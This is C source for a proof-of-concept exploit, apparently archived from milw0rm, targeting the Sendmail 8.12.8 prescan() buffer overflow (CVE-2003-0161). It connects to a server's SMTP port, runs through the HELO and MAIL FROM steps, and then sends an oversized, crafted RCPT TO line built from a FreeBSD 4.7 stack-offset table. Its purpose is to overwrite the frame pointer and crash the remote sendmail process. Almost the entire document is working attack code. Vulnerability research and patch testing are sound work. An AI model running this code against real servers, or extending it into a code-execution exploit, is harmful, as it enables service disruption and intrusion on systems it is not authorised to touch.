
Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution - CVE-2003-0161

/*
 * Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
 *
 * Demonstrates that sendmail 8.12.8 and below are vulnerable to the prescan()
 * bug (CVE-2003-0161). This is a crash-only PoC: it sends no shellcode, and
 * the faulting address 0x5c5c5c5c is made of the '\\' (0x5c) bytes the payload
 * contains. On successful exploitation the target's sendmail should die with:
 *
 * Program received signal SIGSEGV, Segmentation fault.
 * 0x5c5c5c5c in ?? ()
 *
 * Run this only against systems you are authorized to test: a vulnerable
 * server's SMTP process crashes.
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
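/*
 * Per-target stack layout for the prescan() overflow.  Each entry describes
 * where the payload must place the address and how far past pvpbuf to write
 * (field meanings as given by the original author).  Only one target was
 * published with this PoC.
 */
struct arch {
    char *os;           // The OS
    int pos;            // The position of ebp in the stack, with the last byte being 0x00
    int apos;           // The amount of bytes after pvpbuf where ebp is located
    unsigned long addr; // The pointer to the addr buffer
} archs[] = {
    {"FreeBSD 4.7-RELEASE", 180, 28, 0xbfbfdad1},
};

/* Derived from the table instead of hand-maintained, so adding a target entry
 * cannot leave maxarch stale (a stale count either hides targets or indexes
 * past the end of archs[]). */
int maxarch = sizeof(archs) / sizeof(archs[0]);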
  33. /////////////////////////////////////////////////////////
  35. #define BUFSIZE 50096
/* Print the tool banner followed by a blank line. */
void header(void) {
    /* puts() appends the second newline */
    puts("Sendmail 8.12.8 prescan() exploit by bysin\n");
}
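/*
 * Print the banner and the table of known targets: index, address and OS.
 *
 * The original passed an unsigned long to %d and %x, which is undefined
 * behaviour and prints garbage on platforms where long is 64 bits; the
 * index is now an int and the address is printed with %lx.
 */
void printtargets() {
    int i;
    header();
    printf("\t  Target\t Addr\t\t OS\n");
    printf("\t-------------------------------------------\n");
    for (i = 0; i < maxarch; i++)
        printf("\t* %d\t\t 0x%08lx\t %s\n", i, archs[i].addr, archs[i].os);
    printf("\n");
}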
/* Echo one line of protocol text (sent or received) to stdout with a newline. */
void printresponse(char *a) {
    fputs(a, stdout);
    fputc('\n', stdout);
}
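/*
 * Send the NUL-terminated string buf over sock in full, then echo it.
 *
 * send() may accept fewer bytes than requested on a stream socket; the
 * original treated any positive return as success and would have truncated
 * the SMTP line.  Short sends are now retried until the whole line is out.
 * Any error exits with a non-zero status (the original exited 0, which
 * hides failures from callers and scripts).
 */
void writesocket(int sock, char *buf) {
    size_t len = strlen(buf);
    size_t off = 0;

    while (off < len) {
        ssize_t n = send(sock, buf + off, len - off, 0);
        if (n <= 0) {
            printf("Error writing to socket\n");
            exit(EXIT_FAILURE);
        }
        off += (size_t)n;
    }
    printresponse(buf);
}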
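/*
 * Read one SMTP reply from sock and require its numeric code to be
 * `response`; echo it on success, exit non-zero on I/O error or mismatch.
 *
 * recv() is bounded to sizeof(temp) - 1 and the buffer is explicitly
 * NUL-terminated: the original received a full sizeof(temp) bytes, so a
 * reply that filled the buffer left it unterminated and atol()/printf("%s")
 * read past the end of the stack array.
 *
 * NOTE(review): this assumes a whole reply arrives in a single recv(); a
 * reply split across segments would be misread as a bad response.
 */
void readsocket(int sock, int response) {
    char temp[BUFSIZE];
    ssize_t n;

    n = recv(sock, temp, sizeof(temp) - 1, 0);
    if (n <= 0) {
        printf("Error reading from socket\n");
        exit(EXIT_FAILURE);
    }
    temp[n] = '\0';
    if (atol(temp) != response) {
        printf("Bad response: %s\n", temp);
        exit(EXIT_FAILURE);
    }
    printresponse(temp);
}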
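/*
 * Pump server output after the payload until the connection drops.
 *
 * A closed or errored socket is reported as "vulnerable (crashed)"; a reply
 * whose code is 553 is treated as the server having rejected the oversized
 * address and reported as "Not exploitable".  Both are heuristics: an idle
 * timeout, a firewall reset or a rate limit also closes the socket and would
 * be misreported as a crash, so confirm on the target before relying on it.
 *
 * recv() is bounded to sizeof(temp) - 1 and the data NUL-terminated, so a
 * buffer-filling read can no longer leave temp unterminated before atol()
 * and printresponse() treat it as a string.
 */
void relay(int sock) {
    char temp[BUFSIZE];

    for (;;) {
        ssize_t n = recv(sock, temp, sizeof(temp) - 1, 0);
        if (n <= 0) {
            printf("Server vulnerable (crashed)\n");
            exit(0);
        }
        temp[n] = '\0';
        printresponse(temp);
        if (atol(temp) == 553) {
            printf("Not exploitable\n");
            exit(0);
        }
    }
}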
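/*
 * Resolve `host` (dotted quad or name) and open a TCP connection to port 25.
 *
 * Replaces the inet_addr()/gethostbyname() pair of the original, which had
 * two defects: inet_addr() returns a 32-bit in_addr_t that was compared
 * against -1 of a (possibly 64-bit) unsigned long, so on LP64 hosts a bad
 * literal was never detected and 255.255.255.255 was connected to; and the
 * hostent address was memcpy()ed into sin_addr without checking that it was
 * an AF_INET address of the right length.  getaddrinfo() restricted to
 * AF_INET/SOCK_STREAM handles both input forms and yields a ready sockaddr.
 *
 * Returns the connected socket, or -1 after printing a diagnostic.
 */
static int connect_smtp(const char *host) {
    struct addrinfo hints, *res, *ai;
    int sock = -1;

    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_INET;      /* the target table holds IPv4 stack addresses */
    hints.ai_socktype = SOCK_STREAM;

    printf("Resolving address... ");
    fflush(stdout);
    if (getaddrinfo(host, "25", &hints, &res) != 0) {
        printf("Unable to resolve address\n");
        return -1;
    }
    printf("Address found\n");

    printf("Connecting... ");
    fflush(stdout);
    for (ai = res; ai != NULL; ai = ai->ai_next) {
        sock = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (sock == -1)
            continue;
        if (connect(sock, ai->ai_addr, ai->ai_addrlen) == 0)
            break;
        close(sock);
        sock = -1;
    }
    freeaddrinfo(res);
    if (sock == -1) {
        printf("Unable to connect\n");
        return -1;
    }
    printf("Connected\n");
    return sock;
}

/*
 * Build the oversized "RCPT TO:" line for target `a` into buf.
 *
 * Layout, reproducing the original PoC byte for byte: 1241 positions of
 * which every 256th is ';' (four separators) and the rest 'A'.  Inside the
 * fifth token (after the fourth ';') the 'A' at offset a->pos is replaced by
 * the four bytes of a->addr -- the target table describes a->pos as where
 * ebp sits -- followed by a fifth ';' and a->apos pairs of '\\' 0xff, which
 * the table describes as the distance past pvpbuf; then CRLF.  The result is
 * NUL-terminated and contains no NUL byte, so writesocket()'s strlen() sees
 * the whole line.
 *
 * a->addr is serialized little-endian explicitly because the target is
 * i386; the original memcpy()ed the first 4 bytes of an unsigned long, which
 * is only correct on a little-endian build host.
 *
 * Returns the payload length, or 0 if bufsize is too small or a->pos does
 * not fall inside the fifth token (offsets 0..216; the table's 180 does).
 * The original silently sent the line without the address in that case.
 */
static size_t build_payload(char *buf, size_t bufsize, const struct arch *a) {
    static const char prefix[] = "RCPT TO: ";
    size_t need;
    char *p, *pos = NULL;
    int i, seps = 0, m = 0;

    if (a->apos < 0 || a->pos < 0)
        return 0;
    /* prefix + 1241 token bytes + ';' + escape pairs + CRLF + NUL */
    need = (sizeof(prefix) - 1) + 1241 + 1 + 2 * (size_t)a->apos + 3;
    if (need > bufsize)
        return 0;

    memcpy(buf, prefix, sizeof(prefix) - 1);
    p = buf + sizeof(prefix) - 1;
    for (i = 1; i < 1242; i++) {
        if (i % 256 == 0) {
            *p++ = ';';
            seps++;
            continue;
        }
        if (seps >= 4) {            /* inside the fifth token: track its offset */
            if (m == a->pos)
                pos = p;
            m++;
        }
        *p++ = 'A';
    }
    if (pos == NULL)
        return 0;
    pos[0] = (char)(a->addr & 0xff);
    pos[1] = (char)((a->addr >> 8) & 0xff);
    pos[2] = (char)((a->addr >> 16) & 0xff);
    pos[3] = (char)((a->addr >> 24) & 0xff);

    *p++ = ';';
    for (i = 0; i < a->apos; i++) {
        *p++ = '\\';
        *p++ = (char)0xff;
    }
    *p++ = '\r';
    *p++ = '\n';
    *p = '\0';
    return (size_t)(p - buf);
}

/*
 * Usage: <target ip> <target number>
 *
 * Connects to the target's SMTP port, walks the HELO / MAIL FROM dialogue,
 * sends the crafted RCPT TO line and then waits for the connection to drop
 * (relay() decides "vulnerable" vs "not exploitable" and exits).  This is
 * a crash PoC: expect the remote sendmail process to die on a vulnerable
 * host, so only run it against systems you are authorized to test.
 *
 * The target index is parsed with strtol() and rejected on trailing junk;
 * the original's atol() turned any non-numeric argument into target 0.
 * Failures return EXIT_FAILURE instead of the original exit(0).
 */
int main(int argc, char **argv) {
    char buf[BUFSIZE];
    char *end;
    long target;
    int sock;

    if (argc <= 2) {
        printf("%s <target ip> <target number>\n", argv[0]);
        printtargets();
        return 0;
    }
    errno = 0;
    target = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE ||
        target < 0 || target >= maxarch) {
        printtargets();
        return 0;
    }

    header();

    sock = connect_smtp(argv[1]);
    if (sock == -1)
        return EXIT_FAILURE;

    printf("Sending exploit... \n");
    fflush(stdout);

    /* readsocket()/writesocket() exit on any protocol or I/O failure. */
    readsocket(sock, 220);

    writesocket(sock, "HELO yahoo.com\r\n");
    readsocket(sock, 250);

    writesocket(sock, "MAIL FROM: <a@yahoo.com>\r\n");
    readsocket(sock, 250);

    if (build_payload(buf, sizeof(buf), &archs[target]) == 0) {
        printf("Unable to build payload for target %ld\n", target);
        close(sock);
        return EXIT_FAILURE;
    }
    writesocket(sock, buf);

    relay(sock);    /* does not return */
    return 0;
}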
  178. // milw0rm.com [2003-04-30]